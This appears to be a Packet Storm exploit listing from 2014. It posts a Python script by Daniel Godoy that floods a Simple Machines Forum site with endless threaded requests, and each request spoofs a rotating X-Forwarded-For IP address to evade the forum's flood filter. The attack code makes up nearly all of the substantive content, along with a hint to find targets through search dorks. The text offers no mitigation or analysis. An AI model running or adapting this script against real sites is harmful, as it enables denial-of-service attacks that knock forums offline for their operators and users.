what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SMF Flood Filter Issue

SMF Flood Filter Issue
Posted Aug 23, 2014
Authored by Daniel Godoy

SMF allows for a denial of service condition due to a faulty filter.

tags | exploit, denial of service
SHA-256 | a17c1fc2d75d13b9b2542fff763dfc53947c4fb73ba1599019190380ddc685ab

SMF Flood Filter Issue

Change Mirror Download
# Exploit Title: SMF Incorrect Flood Filter Headers# Date: 21/08/2014#
Author: Daniel Godoy# Author Mail:
DanielGodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software: Simple Machine Forum #
http://www.simplemachines.org# Tested on: Linux# DORK: Try yourself ;)

* #!/usr/bin/python
* # RemoteExecution
* #Autor: Daniel Godoy A.K.A hielasangre
*  
* import sys, threading, time, urllib2,re
* print "Ingrese URL: "
* url = raw_input()
* a = b = c = d = 1
* count = 0
* class SMFPwner(threading.Thread):
*   def __init__(self, num):
*       threading.Thread.__init__(self)
*       self.num = num      
*   def run(self):
*     while 1:
*         global a,b,c,d,count, url
*         data = ""
*         while 1:
*             while 1:
*                 if d!=250:
*                     d+=1
*                 else:
*                     if c!= 250:
*                         c+=2
*                         d=0
*                     else:
*                         if b!=250:
*                             c=0
*                             d=0
*                             b+=1
*                         else:
*                             a+=1
*                             b=0
*                             c=0
*                             d=0
*                
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
*                 headers = { 'X-Forwarded-For' : head }
*                
req = urllib2.Request(url, data, headers)
*                 f = urllib2.urlopen(req)
*                 count += 1
*                 print "[ Visitando => " + url + " Por
" + str(count) +" vez ]"
* for i in range(3):    
*  ta = SMFPwner(i)
*  ta.start()

http://pastebin.com/TiZc0T05
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close